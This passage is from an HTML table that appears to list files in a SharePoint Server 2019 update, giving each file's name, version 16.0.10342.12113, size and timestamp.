9:37</td></tr><tr><td>microsoft.cobalt.base.dll</td><td>microsoft.cobalt.base.dll</td><td>16.0.10342.12113</td><td>883320</td><td>4-Mar-19</td><td>09:18</td></tr><tr><td>csisrv.dll</td><td>csisrv.dll</td><td>16.0.10342.12113</td><td>1298784</td><td>4-Mar-19</td><td>09:33</td></tr><tr><td>csisrvexe.exe</td><td>csisrvexe.exe</td><td>16.0.10342.12113</td><td>355496</td><td>4-Mar-19</td><td>09:31</td></tr><tr><td>onfda.dll</td><td>onfda.dll</td><td>16.0.10342.12113</td><td>2130800</td><td>4-Mar-19</td><td>09:31</td></tr><tr><td>columnfiltering.ascx</td><td>columnfiltering.ascx</td><td>\u00a0</td><td>443</td><td>5-Mar-19</td><td>04:04</td></tr><tr><td>docsettemplates.ascx</td><td>docsettemplates.ascx</td><td>\u00a0</td><td>1459</td><td>5-Mar-19</td><td>04:07</td></tr><tr><td>metadatanavkeyfilters.ascx</td><td>metadatanavkeyfilters.ascx</td><td>\u00a0</td><td>4647</td><td>5-Mar-19</td><td>04:19</td></tr><tr><td>metadatanavtree.ascx</td><td>metadatanavtree.ascx</td><td>\u00a0</td><td>2686</td><td>5-Mar-19</td><td>04:19</td></tr><tr><td>multilangtemplates.ascx</td><td>transmgmtlibtemplates.ascx</td><td>\u00a0</td><td>3287</td><td>5-Mar-19</td><td>04:22</td></tr><tr><td>videosettemplates.ascx</td><td>videosettemplates.ascx</td><td>\u00a0</td><td>1972</td><td>5-Mar-19</td><td>04:30</td></tr><tr><td>editdlg.htm_multilang</td><td>editdlg.htm</td><td>\u00a0</td><td>4796</td><td>5-Mar-19</td><td>04:07</td></tr><tr><td>filedlg.htm_multilang</td><td>filedlg.htm</td><td>\u00a0</td><td>3344</td><td>5-Mar-19</td><td>04:11</td></tr><tr><td>ediscoveryquerystatistics.ascx</td><td>ediscoveryquerystatistics.ascx</td><td>\u00a0</td><td>1357</td><td>5-Mar-19</td><td>04:07</td></tr><tr><td>ediscoverytemplate.ascx</td><td>ediscoverytemplate.ascx</td><td>\u00a0</td><td>3267</td><td>5-Mar-19</td><td>04:07</td></tr><tr><td>frmirmp.dll_0001</td><td>microsoft.office.irm.formprotector.dll</td><td>16.0.10342.12113</td><td>169040</td><td>5-Mar-19</td><td>04:12</td></tr><tr><td>pdfirmp.dll_0001</td><td>microsoft.office.irm.pdfprotector.dll</td><td>16.0.10342.12113</td><td>37968</td><td>5-Mar-19</td><td>04:29</td></tr><tr><td>barcodeglobalsettings.ascx</td><td>barcodeglobalsettings.ascx</td><td>\u00a0</td><td>1473</td><td>5-Mar-19</td><td>03:59</td></tr><tr><td>bargensettings.ascx</td><td>bargensettings.ascx</td><td>\u00a0</td><td>1523</td><td>5-Mar-19</td><td>03:59</td></tr><tr><td>dropoffzoneroutingform.ascx</td><td>dropoffzoneroutingform.ascx</td><td>\u00a0</td><td>3528</td><td>5-Mar-19</td><td>04:07</td></tr><tr><td>recordsribbon.ascx</td><td>recordsribbon.ascx</td><td>\u00a0</td><td>367</td><td>5-Mar-19</td><td>04:30</td></tr><tr><td>auditcustquery.ascx</td><td>auditcustomquery.ascx</td><td>\u00a0</td><td>11154</td><td>5-Mar-19</td><td>03:58</td></tr><tr><td>auditsettings.ascx</td><td>auditsettings.ascx</td><td>\u00a0</td><td>3594</td><td>5-Mar-19</td><td>03:58</td></tr><tr><td>barcodesettings.ascx</td><td>barcodesettings.ascx</td><td>\u00a0</td><td>1399</td><td>5-Mar-19</td><td>03:59</td></tr><tr><td>discoveryglobalcontrol.ascx</td><td>discoveryglobalcontrol.ascx</td><td>\u00a0</td><td>5175</td><td>5-Mar-19</td><td>04:06</td></tr><tr><td>discoveryproperties.ascx</td><td>discoveryproperties.ascx</td><td>\u00a0</td><td>7132</td><td>5-Mar-19</td><td>04:06</td></tr><tr><td>discoveryquerystatistics.ascx</td><td>discoveryquerystatistics.ascx</td><td>\u00a0</td><td>3788</td><td>5-Mar-19</td><td>04:06</td></tr><tr><td>dlptemplatepicker.ascx</td><td>dlptemplatepicker.ascx</td><td>\u00a0</td><td>3594</td><td>5-Mar-19</td><td>04:06</td></tr><tr><td>labelsettings.ascx</td><td>labelsettings.ascx</td><td>\u00a0</td><td>9510</td><td>5-Mar-19</td><td>04:16</td></tr><tr><td>retentionsettings.ascx</td><td>retentionsettings.ascx</td><td>\u00a0</td><td>11060</td><td>5-Mar-19</td><td>04:29</td></tr><tr><td>dw20.exe_0001</td><td>dw20.exe</td><td>16.0.10342.12113</td><td>2248872</td><td>4-Mar-19</td><td>09:22</td></tr><tr><td>dwtrig20.exe</td><td>dwtrig20.exe</td><td>16.0.10342.12113</td><td>327896</td><td>4-Mar-19</td><td>09:21</td></tr><tr><td>sltemp.asc</td><td>sldlibtemplates.ascx</td><td>\u00a0</td><td>12554</td><td>19-Feb-19</td><td>06:57</td></tr><tr><td>sldlib.js</td><td>sldlib.js</td><td>\u00a0</td><td>29295</td><td>18-Feb-19</td><td>02:44</td></tr><tr><td>editdlg.htm_slfeat</td><td>editdlg.htm</td><td>\u00a0</td><td>4796</td><td>15-Feb-19</td><td>10:36</td></tr><tr><td>filedlg.htm_slfeat</td><td>filedlg.htm</td><td>\u00a0</td><td>3344</td><td>15-Feb-19</td><td>10:37</td></tr><tr><td>clientx.dll</td><td>microsoft.office.sharepoint.clientextensions.dll</td><td>16.0.10342.12113</td><td>390576</td><td>4-Mar-19</td><td>09:37</td></tr><tr><td>clientxr.dll.x64</td><td>microsoft.office.sharepoint.clientextensions.dll</td><td>16.0.10342.12113</td><td>390576</td><td>4-Mar-19</td><td>09:37</td></tr><tr><td>as_adal_dll_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b</td><td>adal.dll</td><td>\u00a0</td><td>1356400</td><td>18-Feb-19</td><td>02:45</td></tr><tr><td>as_adal_dll_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b</td><td>adal.dll</td><td>\u00a0</td><td>1811056</td><td>18-Feb-19</td><td>02:45</td></tr><tr><td>as_azureclient_dll_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b</td><td>microsoft.analysisservices.azureclient.dll</td><td>\u00a0</td><td>310032</td><td>18-Feb-19</td><td>02:46</td></tr><tr><td>as_azureclient_dll_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b</td><td>microsoft.analysisservices.azureclient.dll</td><td>\u00a0</td><td>309840</td><td>18-Feb-19</td><td>02:46</td></tr><tr><td>as_client_orcl7_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b</td><td>orcl7.xsl</td><td>\u00a0</td><td>95724</td><td>18-Feb-19</td><td>02:46</td></tr><tr><td>as_client_orcl7_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b</td><td>orcl7.xsl</td><td>\u00a0</td><td>95724</td><td>18-Feb-19</td><td>02:46</td></tr><tr><td>as_client_xmsrv_dll_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b</td><td>xmsrv.dll</td><td>\u00a0</td><td>35083552</td><td>18-Feb-19</td><td>02:46</td></tr><tr><td>as_client_xmsrv_dll_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b</td><td>xmsrv.dll</td><td>\u00a0</td><td>25541712</td><td>18-Feb-19</td><td>02:46</td></tr><tr><td>as_clientmsmgdsrv_dll_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b</td><td>msmgdsrv.dll</td><td>\u00a0</td><td>7467088</td><td>18-Feb-19</td><td>02:46</td></tr><tr><td>as_clientmsmgdsrv_dll_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b</td><td>msmgdsrv.dll</td><td>\u00a0</td><td>9102416</td><td>18-Feb-19</td><td>02:46</td></tr><tr><td>as_clientsql120_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b</td><td>sql120.xsl</td><td>\u00a0</td><td>135232</td><td>18-Feb-19</td><td>02:46</td></tr><tr><td>as_clientsql120_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b</td><td>sql120.xsl</td><td>\u00a0</td><td>135232</td><td>18-Feb-19</td><td>02:46</td></tr><tr><td>as_msmdlocal_dll_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b</td><td>msmdlocal.dll</td><td>\u00a0</td><td>45697104</td><td>18-Feb-19</td><td>02:46</td></tr><tr><td>as_msmdlocal_dll_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b</td><td>msmdlocal.dll</td><td>\u00a0</td><td>62970448</td><td>18-Feb-19</td><td>02:46</td></tr><tr><td>as_msolap_dll_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b</td><td>msolap.dll</td><td>\u00a0</td><td>8025168</td><td>18-Feb-19</td><td>02:46</td></tr><tr><td>as_msolap_dll_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b</td><td>msolap.dll</td><td>\u00a0</td><td>10346576</td><td>18-Feb-19</td><td>02:46</td></tr><tr><td>as_msolui_dll_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b</td><td>msolui.dll</td><td>\u00a0</td><td>292112</td><td>18-Feb-19</td><td>02:45</td></tr><tr><td>as_msolui_dll_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b</td><td>msolui.dll</td><td>\u00a0</td><td>312400</td><td>18-Feb-19</td><td>02:46</td></tr><tr><td>as_sqldumper_exe_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b</td><td>sqldumper.exe</td><td>\u00a0</td><td>124000</td><td>18-Feb-19</td><td>02:46</td></tr><tr><td>as_sqldumper_exe_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b</td><td>sqldumper.exe</td><td>\u00a0</td><td>147552</td><td>18-Feb-19</td><td>02:46</td></tr><tr><td>as_xmlrw_dll_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b</td><td>xmlrw.dll</td><td>\u00a0</td><td>273720</td><td>18-Feb-19</td><td>02:45</td></tr><tr><td>as_xmlrw_dll_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b</td><td>xmlrw.dll</td><td>\u00a0</td><td>323680</td><td>18-Feb-19</td><td>02:46</td></tr><tr><td>as_xmlrwbin_dll_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b</td><td>xmlrwbin.dll</td><td>\u00a0</td><td>188520</td><td>18-Feb-19</td><td>02:46</td></tr><tr><td>as_xmlrwbin_dll_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b</td><td>xmlrwbin.dll</td><td>\u00a0</td><td>221792</td><td>18-Feb-19</td><td>02:46</td></tr><tr><td>conversion.office.mso99lres.dll</td><td>mso99lres.dll</td><td>16.0.10342.12113</td><td>14544000</td><td>4-Mar-19</td><td>09:19</td></tr><tr><td>ppt.conversion.mso99lres.dll</td><td>mso99lres.dll</td><td>16.0.10342.12113</td><td>14544000</td><td>\u00a0</td><td>\u00a0</td></tr><tr><td>ppt.edit.mso99lres.dll</td><td>mso99lres.dll</td><td>16.0.10342.12113</td><td>14544000</td><td>\u00a0</td><td>\u00a0</td></tr><tr><td>wac.office.mso99lres.dll</td><td>mso99lres.dll</td><td>16.0.10342.12113</td><td>14544000</td><td>\u00a0</td><td>\u00a0</td></tr><tr><td>conversion.office.mso20win32server.dll</td><td>mso20win32server.dll</td><td>16.0.10342.12113</td><td>4580944</td><td>5-Mar-19</td><td>03:06</td></tr><tr><td>mso.mso20win32server.dll</td><td>mso20win32server.dll</td><td>16.0.10342.12113</td><td>4580944</td><td>\u00a0</td><td>\u00a0</td></tr><tr><td>ppt.conversion.mso20win32server.dll</td><td>mso20win32server.dll</td><td>16.0.10342.12113</td><td>4580944</td><td>\u00a0</td><td>\u00a0</td></tr><tr><td>ppt.edit.mso20win32server.dll</td><td>mso20win32server.dll</td><td>16.0.10342.12113</td><td>4580944</td><td>\u00a0</td><td>\u00a0</td></tr><tr><td>wac.office.mso20win32server.dll</td><td>mso20win32server.dll</td><td>16.0.10342.12113</td><td>4580944</td><td>\u00a0</td><td>\u00a0</td></tr><tr><td>conversion.office.mso30win32server.dll</td><td>mso30win32server.dll</td><td>16.0.10342.12113</td><td>5635152</td><td>5-Mar-19</td><td>03:06</td></tr><tr><td>mso.mso30win32server.dll</td><td>mso30win32server.dll</td><td>16.0.10342.12113</td><td>5635152</td><td>\u00a0</td><td>\u00a0</td></tr><tr><td>ppt.conversion.mso30win32server.dll</td><td>mso30win32server.dll</td><td>16.0.10342.12113</td><td>5635152</td><td>\u00a0</td><td>\u00a0</td></tr><tr><td>ppt.edit.mso30win32server.dll</td><td>mso30win32server.dll</td><td>16.0.10342.12113</td><td>5635152</td><td>\u00a0</td><td>\u00a0</td></tr><tr><td>wac.office.mso30win32server.dll</td><td>mso30win32server.dll</td><td>16.0.10342.12113</td><td>5635152</td><td>\u00a0</td><td>\u00a0</td></tr><tr><td>conversion.office.mso40uiwin32server.dll</td><td>mso40uiwin32server.dll</td><td>16.0.10342.12113</td><td>12568144</td><td>5-Mar-19</td><td>03:06</td></tr><tr><td>ppt.conversion.mso40uiwin32server.dll</td><td>mso40uiwin32server.dll</td><td>16.0.10342.12113</td><td>12568144</td><td>\u00a0</td><td>\u00a0</td></tr><tr><td>ppt.edit.mso40uiwin32server.dll</td><td>mso40uiwin32server.dll</td><td>16.0.10342.12113</td><td>12568144</td><td>\u00a0</td><td>\u00a0</td></tr><tr><td>wac.office.mso40uiwin32server.dll</td><td>mso40uiwin32server.dll</td><td>16.0.10342.12113</td><td>12568144</td><td>\u00a0</td><td>\u00a0</td></tr><tr><td>conversion.office.mso98win32server.dll</td><td>mso98win32server.dll</td><td>16.0.10342.12113</td><td>3972216</td><td>4-Mar-19</td><td>09:35</td></tr><tr><td>ppt.conversion.mso98win32server.dll</td><td>mso98win32server.dll</td><td>16.0.10342.12113</td><td>3972216</td><td>\u00a0</td><td>\u00a0</td></tr><tr><td>ppt.edit.mso98win32server.dll</td><td>mso98win32server.dll</td><td>16.0.10342.12113</td><td>3972216</td><td>\u00a0</td><td>\u00a0</td></tr><tr><td>wac.office.mso98win32server.dll</td><td>mso98win32server.dll</td><td>16.0.10342.12113</td><td>3972216</td><td>\u00a0</td><td>\u00a0</td></tr><tr><td>conversion.office.msoserver.dll</td><td>msoserver.dll</td><td>16.0.10342.12113</td><td>14535248</td><td>5-Mar-19</td><td>03:06</td></tr><tr><td>ppt.conversion.msoserver.dll</td><td>msoserver.dll</td><td>16.0.10342.12113</td><td>14535248</td><td>\u00a0</td><td>\u00a0</td></tr><tr><td>ppt.edit.msoserver.dll</td><td>msoserver.dll</td><td>16.0.10342.12113</td><td>14535248</td><td>\u00a0</td><td>\u00a0</td></tr><tr><td>wac.office.msoserver.dll</td><td>msoserver.dll</td><td>16.0.10342.12113</td><td>14535248</td><td>\u00a0</td><td>\u00a0</td></tr><tr><td>conversion.office.oartserver.dll</td><td>oartserver.dll</td><td>16.0.10342.12113</td><td>18188624</td><td>4-Mar-19</td><td>09:21</td></tr><tr><td>ppt.conversion.oartserver.dll</td><td>oartserver.dll</td><td>16.0.10342.12113</td><td>18188624</td><td>\u00a0</td><td>\u00a0</td></tr><tr><td>ppt.edit.oartserver.dll</td><td>oartserver.dll</td><td>16.0.10342.12113</td><td>18188624</td><td>\u00a0</td><td>\u00a0</td></tr><tr><td>wac.office.oartserver.dll</td><td>oartserver.dll</td><td>16.0.10342.12113</td><td>18188624</td><td>\u00a0</td><td>\u00a0</td></tr><tr><td>conversionhtmlutil.dll</td><td>htmlutil.dll</td><td>16.0.10342.12113</td><td>2884224</td><td>4-Mar-19</td><td>09:36</td></tr><tr><td>onetutil.dll</td><td>onetutil.dll</td><td>16.0.10342.12113</td><td>2893456</td><td>4-Mar-19</td><td>09:36</td></tr><tr><td>conversion.office.osfsharedserver.dll</td><td>osfsharedserver.dll</td><td>16.0.10342.12113</td><td>748152</td><td>4-Mar-19</td><td>09:23</td></tr><tr><td>wac.office.osfsharedserver.dll</td><td>osfsharedserver.dll</td><td>16.0.10342.12113</td><td>748152</td><td>\u00a0</td><td>\u00a0</td></tr><tr><td>osfserver_activities_dll.x64</td><td>microsoft.sharepoint.workflowservices.activities.dll</td><td>16.0.10342.12113</td><td>294792</td><td>4-Mar-19</td><td>09:30</td></tr><tr><td>osfserver_workflow_dll</td><td>microsoft.sharepoint.workflowservices.dll</td><td>16.0.10342.12113</td><td>496528</td><td>4-Mar-19</td><td>09:31</td></tr><tr><td>office_extension_manager_js</td><td>sp.officeextensionmanager.js</td><td>\u00a0</td><td>50904</td><td>4-Mar-19</td><td>09:23</td></tr><tr><td>microsoft.office.serviceinfrastructure.runtime.dll</td><td>microsoft.office.serviceinfrastructure.runtime.dll</td><td>16.0.10342.12113</td><td>1060048</td><td>4-Mar-19</td><td>09:21</td></tr><tr><td>ugcdot.xml</td><td>feature.xml</td><td>\u00a0</td><td>629</td><td>13-Feb-19</td><td>11:38</td></tr><tr><td>microsoft.office.server.directory.sharepoint</td><td>microsoft.office.server.directory.sharepoint.dll</td><td>16.0.10342.12113</td><td>756120</td><td>4-Mar-19</td><td>09:20</td></tr><tr><td>microsoft.office.server.dll</td><td>microsoft.office.server.dll</td><td>16.0.10342.12113</td><td>3050312</td><td>4-Mar-19</td><td>09:20</td></tr><tr><td>microsoft.office.server.dll_isapi</td><td>microsoft.office.server.dll</td><td>16.0.10342.12113</td><td>3050312</td><td>4-Mar-19</td><td>09:20</td></tr><tr><td>microsoft.office.server.openxml.dll</td><td>microsoft.office.server.openxml.dll</td><td>16.0.10342.12113</td><td>1665168</td><td>4-Mar-19</td><td>09:19</td></tr><tr><td>microsoft.sharepoint.taxonomy.dll</td><td>microsoft.sharepoint.taxonomy.dll</td><td>16.0.10342.12113</td><td>1752712</td><td>4-Mar-19</td><td>09:19</td></tr><tr><td>microsoft.sharepoint.taxonomy.dll_gac</td><td>microsoft.sharepoint.taxonomy.dll</td><td>16.0.10342.12113</td><td>1752712</td><td>4-Mar-19</td><td>09:19</td></tr><tr><td>microsoft.sharepoint.taxonomy.dll_gac1</td><td>microsoft.sharepoint.taxonomy.dll</td><td>16.0.10342.12113</td><td>1752712</td><td>4-Mar-19</td><td>09:19</td></tr><tr><td>mediaplayer.xap</td><td>mediaplayer.xap</td><td>\u00a0</td><td>42556</td><td>5-Mar-19</td><td>03:13</td></tr><tr><td>decompositiontree.xap</td><td>decompositiontree.xap</td><td>\u00a0</td><td>90637</td><td>5-Mar-19</td><td>03:13</td></tr><tr><td>addgal.xap</td><td>addgallery.xap</td><td>\u00a0</td><td>428415</td><td>5-Mar-19</td><td>03:13</td></tr><tr><td>wpgalim.xap</td><td>webpartgalleryimages.xap</td><td>\u00a0</td><td>100689</td><td>5-Mar-19</td><td>03:13</td></tr><tr><td>addgallery.xap_silverlight</td><td>addgallery.xap</td><td>\u00a0</td><td>394301</td><td>5-Mar-19</td><td>03:13</td></tr><tr><td>microsoft.sharepoint.client.xap</td><td>microsoft.sharepoint.client.xap</td><td>\u00a0</td><td>321070</td><td>5-Mar-19</td><td>03:13</td></tr><tr><td>dsigres.cab.x64</td><td>dsigres.cab</td><td>\u00a0</td><td>233337</td><td>5-Mar-19</td><td>03:13</td></tr><tr><td>dsigres.cab.x64_10266</td><td>dsigres.cab</td><td>\u00a0</td><td>233337</td><td>5-Mar-19</td><td>03:13</td></tr><tr><td>dsigres.cab.x64_1033</td><td>dsigres.cab</td><td>\u00a0</td><td>233337</td><td>5-Mar-19</td><td>03:13</td></tr><tr><td>dsigres.cab.x64_1087</td><td>dsigres.cab</td><td>\u00a0</td><td>233337</td><td>5-Mar-19</td><td>03:13</td></tr><tr><td>dsigctrl.cab.x64</td><td>dsigctrl.cab</td><td>\u00a0</td><td>482403</td><td>5-Mar-19</td><td>03:13</td></tr><tr><td>dsigres.cab.x86</td><td>dsigres.cab</td><td>\u00a0</td><td>\u00a0</td><td>5-Mar-19</td><td>03:14</td></tr><tr><td>dsigres.cab.x86_10266</td><td>dsigres.cab</td><td>\u00a0</td><td>\u00a0</td><td>5-Mar-19</td><td>03:14</td></tr><tr><td>dsigres.cab.x86_1033</td><td>dsigres.cab</td><td>\u00a0</td><td>\u00a0</td><td>5-Mar-19</td><td>03:14</td></tr><tr><td>dsigres.cab.x86_1087</td><td>dsigres.cab</td><td>\u00a0</td><td>\u00a0</td><td>5-Mar-19</td><td>03:14</td></tr><tr><td>dsigctrl.cab.x86</td><td>dsigctrl.cab</td><td>\u00a0</td><td>\u00a0</td><td>5-Mar-19</td><td>03:14</td></tr><tr><td>ppt.conversion.ppserver.dll</td><td>ppserver.dll</td><td>16.0.10342.12113</td><td>12236440</td><td>4-Mar-19</td><td>09:38</td></tr><tr><td>ppt.edit.ppserver.dll</td><td>ppserver.dll</td><td>16.0.10342.12113</td><td>12236440</td><td>\u00a0</td><td>\u00a0</td></tr><tr><td>powerpointpowershell.format.ps1xml</td><td>powerpointpowershell.format.ps1xml</td><td>\u00a0</td><td>14355</td><td>4-Mar-19</td><td>09:43</td></tr><tr><td>schedengine_new.exe</td><td>schedengine.exe</td><td>16.0.10342.12113</td><td>16880328</td><td>4-Mar-19</td><td>09:27</td></tr><tr><td>microsoft.projectserver.client.silverlight.dll</td><td>microsoft.projectserver.client.silverlight.dll</td><td>16.0.10342.12113</td><td>399680</td><td>4-Mar-19</td><td>09:37</td></tr><tr><td>microsoft.projectserver.client.phone.dll</td><td>microsoft.projectserver.client.phone.dll</td><td>16.0.10342.12113</td><td>399688</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>contentdatabasecreate.sql</td><td>contentdatabasecreate.sql</td><td>\u00a0</td><td>8400835</td><td>4-Mar-19</td><td>09:29</td></tr><tr><td>microsoft.office.project.server.database.dll</td><td>microsoft.office.project.server.database.dll</td><td>16.0.10342.12113</td><td>10374472</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>microsoft.office.project.server.database.extension.dll</td><td>microsoft.office.project.server.database.extension.dll</td><td>16.0.10342.12113</td><td>4382832</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>microsoft.office.project.server.dll</td><td>microsoft.office.project.server.dll</td><td>16.0.10342.12113</td><td>9610864</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>microsoft.office.project.shared.dll</td><td>microsoft.office.project.shared.dll</td><td>16.0.10342.12113</td><td>1905984</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>sdk.microsoft.office.project.shared.dll</td><td>microsoft.office.project.shared.dll</td><td>16.0.10342.12113</td><td>1905984</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>microsoft.projectserver.client.dll</td><td>microsoft.projectserver.client.dll</td><td>16.0.10342.12113</td><td>399072</td><td>4-Mar-19</td><td>09:41</td></tr><tr><td>microsoft.projectserver.client.dll_001</td><td>microsoft.projectserver.client.dll</td><td>16.0.10342.12113</td><td>399072</td><td>4-Mar-19</td><td>09:41</td></tr><tr><td>microsoft.projectserver.dll</td><td>microsoft.projectserver.dll</td><td>16.0.10342.12113</td><td>889560</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>microsoft.projectserver.dll_001</td><td>microsoft.projectserver.dll</td><td>16.0.10342.12113</td><td>889560</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>microsoft.projectserver.serverproxy.dll</td><td>microsoft.projectserver.serverproxy.dll</td><td>16.0.10342.12113</td><td>1302752</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>ps.csom.scriptclient.debug.js</td><td>ps.debug.js</td><td>\u00a0</td><td>1017703</td><td>13-Feb-19</td><td>11:31</td></tr><tr><td>ps.csom.scriptclient.js</td><td>ps.js</td><td>\u00a0</td><td>616270</td><td>13-Feb-19</td><td>11:31</td></tr><tr><td>microsoft.office.project.server.pwa.dll</td><td>microsoft.office.project.server.pwa.dll</td><td>16.0.10342.12113</td><td>2766560</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>microsoft.office.project.server.administration.dll</td><td>microsoft.office.project.server.administration.dll</td><td>16.0.10342.12113</td><td>1008752</td><td>4-Mar-19</td><td>09:20</td></tr><tr><td>pwa.resx</td><td>pwa.resx</td><td>\u00a0</td><td>824177</td><td>4-Mar-19</td><td>09:27</td></tr><tr><td>microsoft.eedict_companies.de.dll</td><td>microsoft.eedict_companies.de</td><td>16.0.10342.12113</td><td>27472</td><td>4-Mar-19</td><td>09:44</td></tr><tr><td>microsoft.eedict_companies.dll</td><td>microsoft.eedict_companies</td><td>16.0.10342.12113</td><td>109872248</td><td>4-Mar-19</td><td>09:44</td></tr><tr><td>microsoft.eedict_companies.en.dll</td><td>microsoft.eedict_companies.en</td><td>16.0.10342.12113</td><td>25208</td><td>4-Mar-19</td><td>09:44</td></tr><tr><td>microsoft.eedict_companies.es.dll</td><td>microsoft.eedict_companies.es</td><td>16.0.10342.12113</td><td>25424</td><td>4-Mar-19</td><td>09:45</td></tr><tr><td>microsoft.eedict_companies.fr.dll</td><td>microsoft.eedict_companies.fr</td><td>16.0.10342.12113</td><td>33408</td><td>4-Mar-19</td><td>09:44</td></tr><tr><td>microsoft.eedict_companies.it.dll</td><td>microsoft.eedict_companies.it</td><td>16.0.10342.12113</td><td>55120</td><td>4-Mar-19</td><td>09:44</td></tr><tr><td>microsoft.eedict_companies.ja.dll</td><td>microsoft.eedict_companies.ja</td><td>16.0.10342.12113</td><td>1542272</td><td>4-Mar-19</td><td>09:44</td></tr><tr><td>microsoft.eedict_companies.nl.dll</td><td>microsoft.eedict_companies.nl</td><td>16.0.10342.12113</td><td>26752</td><td>4-Mar-19</td><td>09:44</td></tr><tr><td>microsoft.eedict_companies.no.dll</td><td>microsoft.eedict_companies.no</td><td>16.0.10342.12113</td><td>2106696</td><td>4-Mar-19</td><td>09:44</td></tr><tr><td>microsoft.eedict_companies.pt.dll</td><td>microsoft.eedict_companies.pt</td><td>16.0.10342.12113</td><td>26240</td><td>4-Mar-19</td><td>09:44</td></tr><tr><td>microsoft.eedict_companies.ru.dll</td><td>microsoft.eedict_companies.ru</td><td>16.0.10342.12113</td><td>33223288</td><td>4-Mar-19</td><td>09:44</td></tr><tr><td>microsoft.eedict_companies_acceptor.ar.dll</td><td>microsoft.eedict_companies_acceptor.ar</td><td>16.0.10342.12113</td><td>9896784</td><td>4-Mar-19</td><td>09:44</td></tr><tr><td>microsoft.stopworddictionary.dll</td><td>microsoft.stopworddictionary.dll</td><td>16.0.10342.12113</td><td>41288</td><td>4-Mar-19</td><td>09:44</td></tr><tr><td>microsoft.system_dictionaries_spellcheck.dll</td><td>microsoft.system_dictionaries_spellcheck.dll</td><td>16.0.10342.12113</td><td>24641152</td><td>4-Mar-19</td><td>09:45</td></tr><tr><td>odffilt.dll.x64</td><td>odffilt.dll</td><td>16.0.10342.12113</td><td>1874616</td><td>4-Mar-19</td><td>09:44</td></tr><tr><td>offfiltx.dll.x64</td><td>offfiltx.dll</td><td>16.0.10342.12113</td><td>2140032</td><td>4-Mar-19</td><td>09:44</td></tr><tr><td>microsoft.ceres.common.utils.dllmsil</td><td>microsoft.ceres.common.utils.dll</td><td>16.0.10342.12113</td><td>330872</td><td>4-Mar-19</td><td>09:34</td></tr><tr><td>microsoft.ceres.contentengine.contentpush.dll</td><td>microsoft.ceres.contentengine.contentpush.dll</td><td>16.0.10342.12113</td><td>168568</td><td>4-Mar-19</td><td>09:22</td></tr><tr><td>microsoft.ceres.contentengine.operators.mars.dll</td><td>microsoft.ceres.contentengine.operators.mars.dll</td><td>16.0.10342.12113</td><td>45688</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>microsoft.ceres.interactionengine.processing.builtin.dll</td><td>microsoft.ceres.interactionengine.processing.builtin.dll</td><td>16.0.10342.12113</td><td>410744</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>searchcore.clustering.indexclusteringmember.dll</td><td>microsoft.ceres.searchcore.clustering.indexclusteringmember.dll</td><td>16.0.10342.12113</td><td>70776</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>searchcore.clustering.indexclustermanager.dll</td><td>microsoft.ceres.searchcore.clustering.indexclustermanager.dll</td><td>16.0.10342.12113</td><td>136320</td><td>4-Mar-19</td><td>09:19</td></tr><tr><td>microsoft.ceres.searchcore.indexstorage.dll</td><td>microsoft.ceres.searchcore.indexstorage.dll</td><td>16.0.10342.12113</td><td>39032</td><td>4-Mar-19</td><td>09:19</td></tr><tr><td>microsoft.ceres.searchcore.journalshipper.dll</td><td>microsoft.ceres.searchcore.journalshipper.dll</td><td>16.0.10342.12113</td><td>95864</td><td>4-Mar-19</td><td>09:22</td></tr><tr><td>microsoft.ceres.searchcore.query.marslookupcomponent.dll</td><td>microsoft.ceres.searchcore.query.marslookupcomponent.dll</td><td>16.0.10342.12113</td><td>590976</td><td>4-Mar-19</td><td>09:40</td></tr><tr><td>microsoft.ceres.searchcore.seeding.dll</td><td>microsoft.ceres.searchcore.seeding.dll</td><td>16.0.10342.12113</td><td>140928</td><td>4-Mar-19</td><td>09:39</td></tr><tr><td>srchccd.js</td><td>search.clientcontrols.debug.js</td><td>\u00a0</td><td>380392</td><td>13-Feb-19</td><td>02:17</td></tr><tr><td>srchcc.js</td><td>search.clientcontrols.js</td><td>\u00a0</td><td>204087</td><td>13-Feb-19</td><td>11:38</td></tr><tr><td>srchuicd.js</td><td>searchui.debug.js</td><td>\u00a0</td><td>116371</td><td>13-Feb-19</td><td>11:30</td></tr><tr><td>srchuicc.js</td><td>searchui.js</td><td>\u00a0</td><td>50907</td><td>13-Feb-19</td><td>11:31</td></tr><tr><td>searchom.dll</td><td>microsoft.office.server.search.dll</td><td>16.0.10342.12113</td><td>21182584</td><td>4-Mar-19</td><td>09:19</td></tr><tr><td>searchom.dll_0001</td><td>microsoft.office.server.search.dll</td><td>16.0.10342.12113</td><td>21182584</td><td>4-Mar-19<